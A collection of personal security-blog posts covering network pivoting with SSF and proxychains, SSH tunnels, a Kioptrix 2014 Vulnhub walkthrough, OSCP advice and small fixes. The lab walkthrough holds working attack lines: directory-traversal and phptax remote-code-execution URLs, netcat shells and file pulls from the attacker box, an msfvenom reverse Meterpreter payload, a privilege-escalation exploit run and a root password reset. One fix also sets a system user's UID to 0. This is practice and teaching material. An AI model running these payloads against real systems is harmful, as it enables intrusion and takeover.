Pivoting on Windows – Secure Socket Funneling

Scenario

We’ve just compromise Windows host, after enumerating it and grabbing any credentials/hashes we can, we then discover that this host was multi-homed. (i.e. This host is a member of another network segment.) A quick ipconfig confirms there are indeed 2 networks that this host is a member of.

multi-homed-ipconfig

Question is; How do we now start to explore this other network? … Well we have a number of choices:

  1. Upload some tools to the host to then scan and enumerate the other network.
  2. Use what we have on the host to enumerate ‘Live off the Land’. Powershell scripts to ping sweep, port scan etc.
  3. Use pivoting to utilise the tools we already have on our attack box to proxy through the Windows host to enumerate the other network.

In this post we shall explore the pivoting method, as we can use all our existing tools already available.

Enter the hideously easy tool: SSF or Secure Socket Funneling,

ssf_logo

SSF I stumbled upon on an engagement while hopelessly trying to get plink working on a Windows host. It was easy to setup and worked out of the box. Below I’ll go through and working example.

Setup

In this diagram the machine with the red monitor is our multi-homed box on 2 networks. (192.168.56.110/24 & 10.20.0.10/24) The attacking box is on the same 192.168.56 segment and the new network we are interested in is the 10.20.0.0/24 network. The box in red has two ip addresses, one for each segment.multi-homed

SSF is freely available from here: https://securesocketfunneling.github.io/ssf/#home just download which platforms and architectures you are interseted in. I just grabbed all of them, just in case 😉

With SSF we get a number of files, we are interested in only two of them.

ssf-binaries

ssfd.exe: This is the server portion of this setup
ssf(.exe) : The client end, this one runs on your attacking box.

Note: All commands are run from the command prompt, either PowerShell or CMD.exe and bash in Linux.

Below we have the server portion running on the Windows box in powershell.

> ssfd.exe -p 11111
-p listening port

ssfd-win10

And here is the client end in bash.

# ./ssf -D 2222 -p 11111 192.168.56.102 
-D create dynamic proxy 
-p port listening on server port (ssfd.exe)
ip address of listening server.

ssf-kali

Note: ip address in this image is wrong. 😉
As you can see the two ends create a tunnel and use the default certificates that came with the installation. Feel free to swap these out with your own.

For the final step in this setup we need one more tool: Proxychains.

ProxyChains is a UNIX program, that hooks network-related libc functions in dynamically linked programs via a preloaded DLL and redirects the connections through SOCKS4a/5 or HTTP proxies. (shamelessly stolen from the github page for proxychains.)

tldr;  it forces TCP programs to send traffic through a already setup proxy.

We configure the configuration file for proxychains. Output below.

tail /etc/proxychains.conf

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 22222

There are no services to restart with proxychains we can just move straight onto the fun parts!

# proxychains nmap -v -sT -sV -Pn --top-ports=10 10.20.0.100
proxychains nmap -sT -Pn -sV --top-ports=10 10.20.0.100
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-27 00:45 BST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:25-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:445-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:443-<--denied
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:139-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:80-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:23-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:21-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:3389-<--denied
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:22-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:110-<--denied
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:21-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:22-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:23-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:25-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:80-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:139-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:445-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:139-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:80-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:80-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:80-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:80-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:80-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:80-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:80-<><>-OK
Nmap scan report for 10.20.0.100
Host is up (0.072s latency).

PORT     STATE  SERVICE       VERSION
21/tcp   open   ftp           vsftpd 2.3.4
22/tcp   open   ssh           OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open   telnet        Linux telnetd
25/tcp   open   smtp          Postfix smtpd
80/tcp   open   http          Apache httpd 2.2.8 ((Ubuntu) DAV/2)
110/tcp  closed pop3
139/tcp  open   netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp  closed https
445/tcp  open   netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3389/tcp closed ms-wbt-server
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.28 seconds

Important Notes! With nmap you need to use -Pn and -sT as proxychains cannot use half connection scans such as SYN. Additionally nmap will fail if you don’t tell it to not trying and ping the target first.
Of course you can use pretty much most programs with proxychains, example:

proxychains ftp 10.20.0.100
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:21-<><>-OK
Connected to 10.20.0.100.
220 (vsFTPd 2.3.4)
Name (10.20.0.100:root):

Summary:
In this post we’ve setup a listening ssfd server on our multi-homed Windows host, connected it with the ssf portion from our attacking box. From here we used proxychains to send traffic down our proxy server out onto the Windows hosts other network segment. And in this case we used nmap to scan for any open ports on just one host. But no reason we cannot scan the entire subnet or even use tools such as nikto for any webservers we may find.

Hope you enjoyed this post.

Have fun!

GRL_UK

SSH Tunnels

putty Putty/ssh port forwarding!

Thought I’d create this post to remind myself and show my colleague and friend @Dark_KnightUK about setting up secure tunnel with port forwarding using ssh, either with putty on Windows or normal ssh client on Linux/Unix/Windows (Yes Windows now has a native ssh client!). I shall walk through setting up both windows and Linux clients to connect to a Windows Desktop on my home network.

Why would you want to use ssh tunneling?

SSH tunnels are useful for securing traffic between 2 hosts that you would like to remain private. SSH itself is a secure shell replacement for Telnet as all traffic is encrypted rather than sent in clear across the network. This mechanism can also be used to bypass various restrictions on public or unknown networks providing your destination has a listening ssh server at the other end.

Reasons I use ssh tunnels:

1. Proxying Web requests via my own http proxy server.
2. Accessing resources in my home network, such as CCTV or mail system.
3. Being able to use RDP on my desktop at home securely.

What is a ssh tunnel?

An ssh tunnel is where you use an already setup ssh connection to forward other traffic securely by specifying which ports need to be proxied. SSH tunnels are not as flexible as a full grown VPN solution as for each port you want to forward needs to be specified individually in the config file. (VPN’s will pass and traffic to any ports once a connection has been made) But its ease of setup makes it easy solution for simple things.

Setup

Firstly you need to setup your home router to port forward (sometimes called a service port) any requests it receives on a particular port from its public interface to an internal address which has a listening SSH server on.

Public address: 45.11.22.33
Home SSH server address: 192.168.0.1 port 22 (default)
Home Windows desktop: 192.168.0.4 port 3389 (default)

puttysshtunnelIn this example my destination public address is on 45.11.22.33 and I have set up the router to listen on port 1337 and forward any requests it gets to an internal address to 192.168.0.1 port 22
Note: You could use any port you wish, not just 1337 😉

SSHD supports tunnels by default, if not check the sshd_config file for the clause ‘Permit Tunnel’ and make sure it is commented out.

#PermitTunnel no

Working example:

I would like to connect to my Windows Desktop at home from work.

Using Windows Putty client:

Setup a normal connection to the public address and before you hit open, go to the SSH > Tunnels section of the client.

putty-tunnel1putty-tunnel2

Add in the source port box 3390 and the destination of 192.168.0.4:3389 and hit Add. It should add the entry to the window above.(Note: I use 3390 as a service may already be using port 3389 on my local windows machine. In this case it would be RDP services)

Log in to ssh as normal, once in all I need to do is fire up Remote Desktop Client (mstsc) and then make a connection to my local address (127.0.0.1) and the port specified.
mstsc
I should now be connected to my own machine.

Alternative method

The Spring update to Windows 10 provided a new native ssh client via Powershell:

ssh -L 3390:localhost:3389 me@45.11.22.33

This should do the same thing as putty but via Powershell instead. Now just use RDP client as above and you should have a desktop as well.

Linux version

Accessing RDP on a windows machine on my home network.

ssh me@45.11.22.33 -L 3390: 192.168.0.4:3389

Connect to host 45.11.22.33 with username of ‘me’ forward (-L) the local port 3390 to ip of 192.168.0.4 to port 3389. Easy.

Then just fire up yor favourite RDP client (rdesktop or other) and point it to your local address on port 3390 and you be now connected to your own machine.

Conclusion:

There are many more ways to use ssh tunnels with both remote and local port forwarding. This method is the one I find the most useful. Hope this has been clear for you all. Some of these concepts can mess with your head.

Have fun!

Nethunter apt issue resolving http.kali.org

Been a while since I fired up my Nethunter tablet, its such a great form factor, small and portable. It has not been used in anger yet, but I do like to keep all my devices updated. Especially with the latest versions of exploit-db fresh from the Kali repo’s 🙂

Unfortunately that task failed. :-/

Issue: Apt fails to resolve http.kali.org, error below.

root@kali:~# apt-get update
Err:1 http://http.kali.org/kali kali-rolling InRelease
Temporary failure resolving 'http.kali.org'
Reading package lists... Done
W: Failed to fetch http://http.kali.org/kali/dists/kali-rolling/InRelease Temporary failure resolving 'http.kali.org'
W: Some index files failed to download. They have been ignored, or old ones used instead.

The standard checks of /etc/resolv.conf to see if I was missing any DNS servers. Then the /etc/hosts file also in case anything weird was stopping the resolver from trying DNS. All looked normal.

Other things such as dig and apps such as Firefox were behaving normally. This meant it was not a networking issue or a real resolver issue system wise. It was unique to apt.

Solution:

A web search provided the following check and fix.

grep 'apt' /etc/passwd|
_apt:x:114:65534::/nonexistent:/bin/false

Update the ‘_apt’ UID to 0

_apt:x:0:65534::/nonexistent:/bin/false

/etc/passwd format:
username:password:UID:GID:user info:Home dir:command shell

Related Bug: apt-get errors

Explanation (sort of): seems like the user _apt had issues using the resolver, update the UID and things worked fine. No real explanation in the bug report other than it was fixed in later releases.

Note: The permission on /etc/resolv.conf were set to -rw—— but updating these so users could read the file did not fix this. So the original fix above still stands.

Hope this helps someone.

 

Keeping skills sharp

This post is about maintaining skills you learn.

Skills can be lost as well as gained depending on how much we use them.

Python_rps

For example, in the beginning of my OSCP certification I decided to do a Python course as supplemental learning in addition to the what was taught. (Exploit development, and crafting one or two custom tools for enumeration.) It did help a lot and I enjoyed working with the language tremendously.

After passing the certification and carrying on with normal day to day work, the skills I picked up begin to fade. I forgot basic things, mixing Python syntax with BASH’s. Now when I try and code something, I’m looking things up, referencing old code; not a good place to be in.

The solution?

Find an excuse to use you skills in everyday tasks, or even give yourself exercises to do, I stumbled upon a website that suggests excellent fun projects to code. These included simple games and other tools used to do specific tasks.

Here are a few fun Python exercise examples I decided to play with, the first of which is below:

  1. Rock paper scissors
  2. Number guessing game high low.
  3. Password / passphrase generator
  4. Fast network Ping tool

Rock paper scissors project:

My version, it probably needs more work but the basic functionality is there. Forgive the horrible lack of syntax highlighting.

#!/usr/bin/python3 
import random 
import sys 
 
#Defined for display loop. while 
choice=-1 
game_choice = ['Rock', 'Paper', 'Scissors'] 
secure_random = random.SystemRandom() 
 
 
#Print list for display 
def display_choices(): 
 pos=0 
 print('Select one of the options') 
 while pos <= 2 : #for opt in choice : 
 print (pos,game_choice[pos]) 
 pos=pos+1 
 
def compare_choices(c,u): 
 paprock='\nPaper wraps Rock' 
 scispap='\nScissors cut Paper' 
 rockscis='\nRock blunts Scissors' 
 lose='\n---------------You lose!-----------' 
 win='\n~~~~~~~~~~~~~~~~You win!~~~~~~~~~~~~' 
 if u == c : print ('\nIts a draw\n') 
 if u == 'Rock' and c == 'Paper' : print(paprock,lose) 
 elif u == 'Paper' and c == 'Scissors' : print(scispap, lose) 
 elif u == 'Scissors' and c == 'Rock' : print(rockscis, lose) 
 #Winning section 
 elif c == 'Scissors' and u == 'Rock' : print(rockscis,win) 
 elif c == 'Paper' and u == 'Scissors' : print(scispap,win) 
 elif c == 'Rock' and u == 'Paper' : print(paprock,win) 
 
 
while choice != 9: 
 display_choices() 
 ans=input('Choose an option (0,1,2 or 9 to exit): ') 
 choice=int(ans) 
 if choice == 9 : sys.exit() 
 u_choice=game_choice[choice] 
 c_choice=(secure_random.choice(game_choice)) 
 compare_choices(c_choice,u_choice) 
 print('\n') 

Lots of improvements could be done, but it was a fun little project to do and I learned about ‘system.random()’ so it was a learning experience too.

I have a few idea’s of a tool I would like to code, so watch this space as it were. I would encourage anyone to try this and keep their skills sharp. I shall be coding the rest of the list later on and will do small posts with my versions of them. Feel free to comment on how bad my coding is or any tips for improvement!

Thanks for reading and have fun.

GRL_UK

 

 

Vulnhub Practice: Kioptrix 2014

What is Vulnhub?

Vulnhub.com is a site dedicated to providing machines that you can download and practice compromising in a safe legal manner. Quoted from their website directly Vulnhub.com’s purpose:

To provide materials that allows anyone to gain practical ‘hands-on’ experience in digital security, computer software & network administration.

What does this mean? Well it means I can practice the skills I gained from the OSCP course and keep my tools sharp so to speak. We all know if you do not use something on a regular basis you forget things and lose your edge.

The machines listed in my previous blog (OSCP Prep) are the ones I shall be working my way through.

First on  my list Kioptrix 2014, the last one of a series created by Stephen McElrea  (Loneferret) who has sadly passed away in July 2017.

Kioptrix 2014 is aimed at beginners so should be a nice fun one to start with.

Setup is straight forward, use VirtualBox (or VMWare player) for the hyper-visor. Links here for what you may need:

https://www.vulnhub.com/entry/kioptrix-2014-5,62/
https://www.virtualbox.org/wiki/Downloads (Windows) – Linux users will have this in their chosen Linux package repo.

Most of the machines I play with are in Virtual box and this machine does work in Virtual Box, it just needs a little tweaking. There is a fix bzip archive that is available with this machine to enable it to run on Virtual box. If you run VMWare it should work just fine. If you follow the excellent instructions and screenshots it should not take you long to get this up and running. (I may do a write up of the setup later)


The Walk through:

Let start, Nmap needs to be run on this host to see what we are dealing with.

Screenshot from 2017-12-17 15-12-14
Simple Nmap scan reveals that there are only really 2 ports open. The scan also tells us this maybe a FreeBSD Unix box running Apache (nothing is concrete until we can confirm via other methods). So we have some idea of the platform.

Dirbuster is ran on this host to see if there are any hidden directories, the tool doesn’t give us anything, it errors out after a few minutes. The host port 8080 is even quicker to error out.

As port 80 and 8080 are open and are web ports, we select another tool for scanning web systems. The Nikto web scanner is run to see if there are any obvious vulnerabilities we can exploit. (nikto -h http://192.168.56.101)

Screenshot from 2017-12-17 15-55-00

From this we  can see only 1 obvious vulnerability:
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

A quick search with either searchsploit (courtesy of Kali Linux) or exploit-db show 2 potential exploits.
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | exploits/unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow | exploits/unix/remote/764.c

Both of these however do not cover the combination of Apache and FreeBSD we have, so without some more exploit development on the system itself we can’t use this.

nikto on port 8080 is pretty much the same as the port 80 scan.

When you try and browse the page you are greeted with a Forbidden page. Dead end for now.

Looking back at the main page on port 80 we see the default ‘It works’ page, pretty standard. The source code however (as we are a curious type) yields this little gem of information:

80-source-pchart

A quick check of searchsploit or exploit-db reveals 2 vulnerabilities, one directory traversal issue and a XSS one. Lets have a look at the Directory Traversal issue.


"hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd"

So converted in to real world lets see if we can grab the /etc/passwd file as a test.

dirtrav-passwd

Now that we know that works lets do some more enumeration and get more information on this host. As we got the Apache forbidden page we’ll try and find where the config is and take a look at what we are dealing with. Firstly we need to know where the config file lives, a little googling gives us the path.


http://192.168.1.54/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

apache-config

The config reveals the 8080 site is looking for a specific user agent: Mozilla/4. One way round this is a user agent switcher. Most modern browsers have plenty of extensions and plug-ins, we just need to find one that will allow us to present a different user agent string to the web server. ‘User agent Overrider’ was selected (realistically any one could be used.) The string was set for custom as: Mozilla/4.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3

Now when we browse the site on 8080 we get a different page. Our browser meets the criteria needed to see the page. Result below.

user-agent-phptax

Following this obvious link.

This reveals a hidden page and gives us something to enumerate more.

phptax

Enter searchsploit/exploit-db searching for phptax, we find 3 possible exploits, one Metasploit and 2 manual. The manual ones list a RCE

PoC: http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

Firstly,  the Metasploit way. Searching for phptax yields one exploit exploit/multi/http/phptax_exec, we set the options of RHOSTS and RPORT and then run the exploit. This gets us a very basic shell. First thought, can we improve the shell? No in this case, I’ve not managed to find a way, but I shall keep researching and update you all when I do get some answers.

So,  we have a shell, from here its more enumeration to see what we have and what is available to us. From the screen shots that we have the same id as the Apache web service. Present working directory (pwd) is /usr/local/www/apache22/data2/phptax.msf-exploit-phptax

uname -a : FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64

Through enumeration we confirm the platform and find the version of the kernel and that we have access to netcat. (Which will be handy for transferring files later.)

Searching again we find 3 privilege escalation exploits, one Metasploit version. With our basic shell we cannot run the Metasploit exploit without first improving it. Meterpreter would be the ideal improvement. We do have 2 choices;

  1. Concentrate on getting a Meterpreter shell
  2. Carry on and get privilege escalation to a root shell?

Privilege Escalation

Root access is the end result so lets have a look getting that. We can look at getting a Meterpreter shell afterwards, which if thing go to plan will be a root privileged.

We know the system is a FreeBSD and we know the version is 9.0. Checking these strings with searchsploit for a privilege escalation exploit gets us 3 results:

searchsploit-priv

FreeBSD 9.0 – Intel SYSRET Kernel Privilege Escalation 

$ searchsploit -m 28718

As we cannot use the Metasploit version yet, we shall try the next one. (Sometimes it take a lot of trial and error to find the correct exploit). We can use netcat to transfer the source code to the Kioptrix box using the following commands:

Attacking box: nc -nvlp 1337 < priv-28718.c

Kioptrix: nc -nv 192.168.56.1 1337 >> priv.c

We use a client connection out as the server may have ports blocked via a firewall we have not encountered yet.

Once transferred we need to use gcc installed to compile the exploit. Luckily we can compile the exploit as gcc is installed. (If it was not installed we could replicate the environment a local vm / labs and copy the binary over. )

gcc priv.c -o priv
./priv

Once compiled we execute it, will it work?

./priv
[+] SYSRET FUCKUP!!
[+] Start Engine…
[+] Crotz…
[+] Crotz…
[+] Crotz…
[+] Woohoo!!!
id
uid=0(root) gid=0(wheel) groups=0(wheel)

We have root! 🙂
OK now we have a look for the congrats.txt file that the author kindly put into place for us.

Is this the end? Have we finished?

Well not for me, I prefer to get better access. More direct.

SSH was not enabled, but seen as we are root we can have a look at enabling it. A little more googling gave me information on how to enable and start the sshd service.


echo 'sshd_enabled="yes"' >> /etc/rc.conf
service sshd onestart

While we are at it, we can either create a new account or just reset the root password with the passwd command.

echo "lamepassword1" | pw usermod root -h 0

If we were going to use this box as a way into a network we would create another account and copy off the relevant files to crack any accounts for use later.

Then it is trivial to ssh into the box and use the front door.

kioptrix-message

Alternative methods.

Though I am happy to use Metasploit to gain access to this box I prefer to find other ways to manually gain a shell.

Seen as the sites are predominately PHP it would seem logical to see if we can leverage something.

The following code is a common exploit for web servers that are susceptible to local code execution.

Using the phptax exploit we can do this:

http://192.168.56.101:8080/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-nv%20192.168.56.1%201337%20%3E%3E%20shell2.php%20;&pdf=make

Which translates to: nc -nv 192.168.56.1 1337 >> shell2.php

Attacker box: nc -nvlp 1337 < shell2.php

cat shell2.php

php-cmd

Once this file is transferred we can now call the page and run off commands that are helpfully output to the page.

shell2-php

We can use this to further enumerate the host to the extent of how much access the user running Apache can do.

Using this same method of transfer we can also upload a php Meterpreter payload.

msfvenom is used to generate a php reverse tcp Meterpreter payload:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=1337 -f raw > met_php.php

Then we simply upload it to the server.

http://192.168.56.101:8080/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-nv%20192.168.56.1%201337%20%3E%3E%20met_shell.php%20;&pdf=make

Before we trigger the payload we need to set up the multi/handler listener within Metasploit and make sure it matches our msfvenom generated payload.

Screenshot from 2017-12-17 11-07-59

All we need to do it browse to the URL to trigger the payload.

As you can see we now have our Meterpreter shell. From this we have access to all the modules and post exploits. We can spawn a shell from here and carry on with the privilege escalation to get root.

Other methods?

Other methods are to upload a reverse PHP shell from pentestmonkey  I’ve not tried this but other walk-throughs suggest favourable results.

Mitigation?

Patching, as you are probably aware will fix the majority of security holes outside of configuration issues. We would make sure all the software was up to date, vulnerabilities would/should be patched on phptax and pChart. If no patches are available we’d logically migrate away from vulnerable software or place more security barriers in place. Operating system security updates would also need to be installed. FreeBSD version 9 reached End of Life March 2013 so it would be advisable to retire the entire server.

The server does have some security, note from the author:

For fun, I installed “OSSEC-HIDS” and monitored a few things.
Default settings, nothing fancy but it should’ve logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified files in 2 specific folders.

The OSSEC-HIDS system log file and the folderMonitor log file added by the author displays all our attempts and even has the Meterpreter PHP payload.

ossec

Finally the author leaves us with the final PS in his message.

p.s.: Keep in mind, for each “web attack” detected by OSSEC-HIDS, by
default it would’ve blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part 🙂

—————————————————————————

This means our attacks would more than likely been halted or delayed at least.

Conclusion / Lessons learned?

It was fun exploiting this box, after finishing it via the Metasploit method I had fun finding other ways in. There was some trial and error with the netcat transfers, which needed to be the server and which the client. I Learned quiet a bit more about FreeBSD Unix, my normal day to day operating systems were Linux or Windows, so it was fun playing once I was root.

Interestingly having gcc installed on the server and netcat were instrumental in exploiting this server. Without netcat you could use TFTP or FTP to transfer files, if the client tools were there. Lesson: Don’t make things easy for an attacker.

I hope you learned something from this walk-through, I certainly had fun and even picked up some new knowledge. I would encourage anyone to replicate what I have done and try out all the methods I have documented. You may even find more methods, feel free to commend below and let me know.

Have fun.

 

References

Offensive Security Exploit db – https://www.exploit-db.com/
Vulhub.com – https://www.vulnhub.com/
Searchsploit – Kali Linux. https://www.kali.org/
Kioptrix website – https://www.kioptrix.com/blog/

Running X Apps for another user.

Issue:

You are logged into your desktop but you need to run another X-windows process that as a different user. eg. Hexchat whilst logged in as root (mostly Kali related.)

Hexchat and potentially other applications may pop up a helpful prompt letting you know not to run things as root as it is a ‘Bad Thing™’

hexchat-error

Glorious message isn’t it!

Problem being that the user does not have permission to run on the current display. X windows will check a file named Xauthority to see if that user has permission to spawn a process on the current display.

Solutions:

In a terminal type the following:


xhost + SI:localuser:muh
gksudo -u muh hexchat #Or su - muh -c hexchat

xhost is a command that gives authority for hosts or users to access your X environment and run apps in the session. The SI section means Server Interpreted and as localuser with username muh. Essentially SI:<hostname>:<username> Note: This lasts only for the duration of your X session. So rebooting would remove this.

gksudo much like sudo but for X. The switch -u is for user (username being muh in this instance) This should start Hexchat or which ever application you need. If you are not root you will be prompted for a password of the user. And that’s it.

Update April 7th 2019 : Add export DISPLAY=:0.0 into ~/.bashrc for the user you want to run the application as.

Hope this was useful for someone out there.

GRL.

OSCP – Experiences and Advice.

Certification name: Offensive Security Certified Professional:
Penetration testing with Kali Linux. (PWK)

Intro:

If you’ve reached this page you maybe gathering information on whether to do this certification or another one, say maybe the CEH?
What follows is my experience when I took and passed what I think is an excellent course and exam. Then some tips for preparing so you can get the most out of it.
The course itself is well worth the pain it happily puts you through. Did I mention the anguish? Well you will get plenty of both, but once you get passed all that, the rewards make it well worth it.

Course details

The course itself if available in 30, 60 or 90 Days with option to purchase more lab time with an exam shot. You get the course material and then the the chosen amount of time in the labs you bought with it. Firstly you will need to download the recommended virtual machine image that will have all the tools necessary for you to successfully complete the course (Links in the course material). As well as a hyper-visor to run it. (Either Virtual Box or the VMWare Workstaion or the free VMWare Player). You work through the material, do the exercises and test what you have learned in the labs so you can become familiar with the tools and methodology.
The labs themselves are essentially a number of networks you access via VPN that you can freely scan and attack to your hearts content. There are a few restrictions such as no ARP spoofing or DNS attacks, anything that could potentially disrupt other students as you do share the labs. There are a number of identical lab networks that are available that students get assigned to so you do not have to worry about congestion or clashing with other students attacking the same box. In fact some popular boxes are duplicated within the environment. This reduces the likely hood of students clashing (it can happen but it is greatly reduced). Students are also encouraged to do a couple of checks before the attack a target. If its being reverted (reset) recently there is a good chance another student is currently playing with it.
But don’t worry there are over 50+ machines across 3 networks in the labs so you will not be short of machines to try an break into.
The main purpose of the labs to is bestow experience on you, each machine has a different way to be attacked. Although you could potentially use the same exploit on similar machines, you would not gain or learn anything from it. It is generally recommended that you do most if not all of the labs before you go for your exam, but this is just a suggestion. I know of some people who had only done a small handful of lab machines and passed their exam fine. But this is purely down to the individual. (One or two of them may even already be Pentesters so already have good experience)

Course experiences.

Coming from a sysadmin point of view the course taught some lessons in not being afraid of breaking/changing things and trying things out. It was a difficult thing to learn for myself as I was so used to fixing and keeping services up and running.
The material was mostly all new to me, I have Linux and Windows experience and some scripting skills so these bits were easily assimilated. But other sections such as buffer overflow and understanding registers were all new, as well as the small amount of Python too.
At times I felt like I was over my head, and as it is intended; you do need to do a lot of external research to get a full grasp of all the exercises. This is all part of the course. Read one section, spend the next 3 hours reading other resources until you were happy with what you learned.

How long will it take to pass?

Every one is different, it will depend on how much time you have per week you can devote to this course. If you can get 5 hours a day you should be able to get through everything within 2 weeks easily. But if like myself you have work, life, food and sleep that gets in the way it will take you longer. But please do not get hung up on how fast you need to pick up this stuff. I myself started in March, and passed beginning of November on my 2nd attempt. I did have a full 2 weeks off from work to do labs and I found this invaluable. But this would depend on how flexible your work place is.

The course aim is to empower student to learn themselves, try things out, fail a lot but always learning from the failures. The course moto isn’t ‘Try harder‘ for nothing! Spoilers are discouraged by admins and other students. Where’s the fun in being told the answers when you need to learn yourself.

One of my issues with this course was the fact that you get your course material at the same time as your lab sessions start. So you are conscious of the time you are taking. Your lab time is counting down. So you may race through the material just to get into the labs sooner and before your time runs out.

My advice, book the 30 day session as your first then once you need more you get what you need. This means if something happens as life always does, you do not have lab time wasting away.

Student support and resources:

IRC Chat

IRC on freenode network channel: #offsec : a place where you can talk to other students.

Forums:
Contain a vast array of knowledge and a place to ask question and read a little more about the machines in the labs. Admins are very good a trimming off any potential spoilers, as you will not learn anything by being told how to break into a particular box.
Live Chat with Admins:
If you get truly stuck you can chat to an admin who will ask you what you have done and guide you without giving too much away. It may as simple as ‘You are heading in the right direction keep going.’

Recommendations:

Preparation before the course:
This is an excellent guide to preparing for the course. Its well written and will benefit anyone who is looking to participate in all the fun 😉 I followed this guide a little late but did follow this as supplemental for my learning.
Hind sight: Do the prep first before the course. You will benefit greatly
Useful things to also learn:
  1. Bash scripting (nothing serious just some loops, output redirection and pipes. Common tools for string manipulation such as sed, grep, cat, cut etc.)
  2. Python to a very basic (just enough for developing, changing exploits)
  3. Basic Linux administration (moving around the filesystem, day to day administration)
  4. Basic Windows Administration
Once you’ve done the above why not have a play with some vulnerable machines and dip your toe in.
OSCP like virtual machines from Vulnhub.
You can either do the above before or after your course, I know some people who do these machine as a supplemental after their labs finish. Good for practice.
I am running through these now, to gain more practice and experience. And I shall also be getting more lab time in despite having passed the course. I did not finish off all the machines so I cam eager to gain more from them. The labs are that good.

So to summarise….

  1. Do the prep first (read the book, watch the videos)
  2. Book your course and lab length
  3. Do at least 30-40 machines in the labs
  4. Re-grow hair.
  5. Book exam
  6. Pass your exam.
  7. Have some tea.
That’s it. Hope you enjoyed reading as much as I enjoyed writing this.
Have fun.
GRL

edb Failed to load missing core debugger plugins

Hit an issue with starting the Linux debugger: edb when trying a buffer overflow exercise in Kali a little time after I updated it. Been a little while since I did an exercise of this nature so am not sure how long this has remained broken.

EDB will not run and just displays a blank screen with the message displayed below.

edb_error1

I did manage to fix this after doing a search of the file system to locate the relevant plugins/libs necessary (locate edb |grep  libDebuggerCore.so )

Solution: Options > Preferences > > Plugin Directories

This value in my case should of read /usr/lib/x86_64-linux-gnu/edb or what ever the above command found, not every system is the same.

Update and close, then restart edb.

There was a bug reference about this dated Feb 2017. Github Bug edb New packages were updated but the user pref in your home directory (.config/codef00.com/edb.conf) may still have the old ref in it and not work despite having the correct package version. The fix above updates this file.

Hope this helps someone.

Relearning old skills

gtypist3

Over the years I’ve been happily typing away ad-hoc, sometimes one key pecked at a time, sometimes getting a series of keys rolling and getting that satisfying few words in quick succession. Typing for me is one of my slowest and most frustrating ways to get what I am thinking into a written form. Writing was just as bad. When in a hurry my hand writing deteriorated to just a mess.

Gradually over time my typing got faster but I was always looking at my hands making sure I hit the right key as quickly as possible….Only to look up and see that I made a mistake 3 words back. Which now frustratingly I had to scroll back and correct, and then carry on where I left off just to do it again next time I looked up…. rinsing and repeating until I was done. Sure some words your hands learned to fire off completely from what is referred to as muscle memory but inevitably you’d fall right back into the method you have trained yourself to use.

